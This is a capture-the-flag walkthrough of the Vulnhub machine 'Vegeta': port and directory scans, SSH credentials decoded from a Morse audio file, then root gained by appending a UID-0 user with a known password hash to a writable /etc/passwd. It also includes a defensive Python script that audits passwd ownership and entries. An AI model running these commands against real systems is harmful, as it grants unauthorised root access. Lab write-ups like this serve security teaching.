[VLN] Vegeta

Today we are going to hack the Vulnhub machine called Vegeta. You can download it from the following link: Vegeta


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-29 13:26 CEST
Nmap scan report for Vegeta.home (192.168.1.100)
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA)
|   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA)
|_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds

sml@Cassandra:/usr/share/seclists/Discovery/Web-Content$ gobuster dir -u http://192.168.1.100 -w directory-list-2.3-big.txt -x php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.100
[+] Threads:        10
[+] Wordlist:       directory-list-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html
[+] Timeout:        10s
===============================================================
2020/06/29 13:29:26 Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/login.php (Status: 200)
/image (Status: 301)
/admin (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
/bulma (Status: 301)
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQf
sclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0Q
QsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsore
finesearchZ1.html (Status: 403)
===============================================================
2020/06/29 13:47:52 Finished
===============================================================
We see an interesting directory: /bulma. Visiting it, we find a .wav file, which we download. Once downloaded, we go to the following page: https://morsecode.world/international/decoder/audio-decoder-adaptive.html

We upload the audio, and it finally shows:

USER : TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)

These look like credentials :) Let's try them!

Low Shell



sml@Cassandra:~$ ssh trunks@192.168.1.100
trunks@192.168.1.100's password: 
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72
trunks@Vegeta:~$
Now that we are inside the system, we dig a little deeper...

trunks@Vegeta:~$ cat .bash_history
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history 
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history 
exit
We see that the history contains commands that try to modify /etc/passwd to add the user Tom, with UID and GID 0 (like root). Let's take a look at the permissions on /etc/passwd.

trunks@Vegeta:~$ ls -l /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd
The file is owned by trunks, so that user has write permission on it. Knowing this, we run the command from the history to create the user Tom, then log in as Tom to get a root account!

Privilege Escalation


We run the following command to add Tom to the system...

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
We log in as Tom (password: Password@973).

trunks@Vegeta:~$ su Tom
Password: 
root@Vegeta:/home/trunks#
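
From the defender's side, the escalation above depends on two conditions that are easy to audit: /etc/passwd being owned by (or writable for) a non-root user, and an entry that carries UID 0 or a password hash directly in the passwd file instead of the shadowed "x". The script below is an added example, not part of the original walkthrough; the sample entries and the UID 1000 are constructed, and the function names are my own.

```python
import os
import stat

# Constructed sample: two stock entries plus the line the walkthrough appends.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
trunks:x:1000:1000:trunks:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

def check_metadata(uid, mode):
    """Flag ownership/permission bits that let a non-root user edit the file."""
    findings = []
    if uid != 0:
        findings.append(("owner-not-root", str(uid)))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("group-or-world-writable", oct(stat.S_IMODE(mode))))
    return findings

def audit_passwd_text(text):
    """Flag passwd(5) entries that grant root or bypass /etc/shadow."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed-entry", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(("uid0-not-root", name))
        if pw == "":
            findings.append(("empty-password", name))
        elif pw not in ("x", "*", "!"):
            findings.append(("hash-in-passwd", name))  # should be "x" (shadowed)
    return findings

def audit_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return check_metadata(st.st_uid, st.st_mode) + audit_passwd_text(fh.read())

if __name__ == "__main__":
    # 1000 is a constructed UID standing in for the non-root owner seen in `ls -l`.
    for finding in check_metadata(1000, 0o100644) + audit_passwd_text(SAMPLE):
        print(*finding, sep="\t")
```

On a healthy system `audit_passwd_file()` returns an empty list; the fix for the findings shown here is `chown root:root /etc/passwd` with mode 644 and removal of the extra UID 0 entry.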

root.txt



root@Vegeta:/home/trunks# cd /root
root@Vegeta:~# ls
root.txt
root@Vegeta:~# cat root.txt

                               ,   ,'|
                             ,/|.-'   \.
                          .-'  '       |.
                    ,  .-'              |
                   /|,'                 |'
                  / '                    |  ,
                 /                       ,'/
              .  |          _              /
               \`' .-.    ,' `.           |
                \ /   \ /      \          /
                 \|    V        |        |  ,
                  (           ) /.--.   ''"/
                  "b.`. ,' _.ee'' 6)|   ,-'
                    \"= --""  )   ' /.-'
                     \ / `---"   ."|'
  V E G I I T A       \"..-    .'  |.
                       `-__..-','   |
                     _.) ' .-'/    /\.
               .--'/----..--------. _.-""-.
            .-')   \.   /     _..-'     _.-'--.
           / -'/      """""""""         ,'-.   . `.
          | ' /                        /    `   `. \
          |   |                        |         | |
           \ .'\                       |     \     |
          / '  | ,'               . -  \`.    |  / /
         / /   | |                      `/"--. -' /\
        | |     \ \                     /     \     |
 	 | \      | \                  .-|      |    |


Hurray you got root

Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw

End


And with this we are root on the machine :)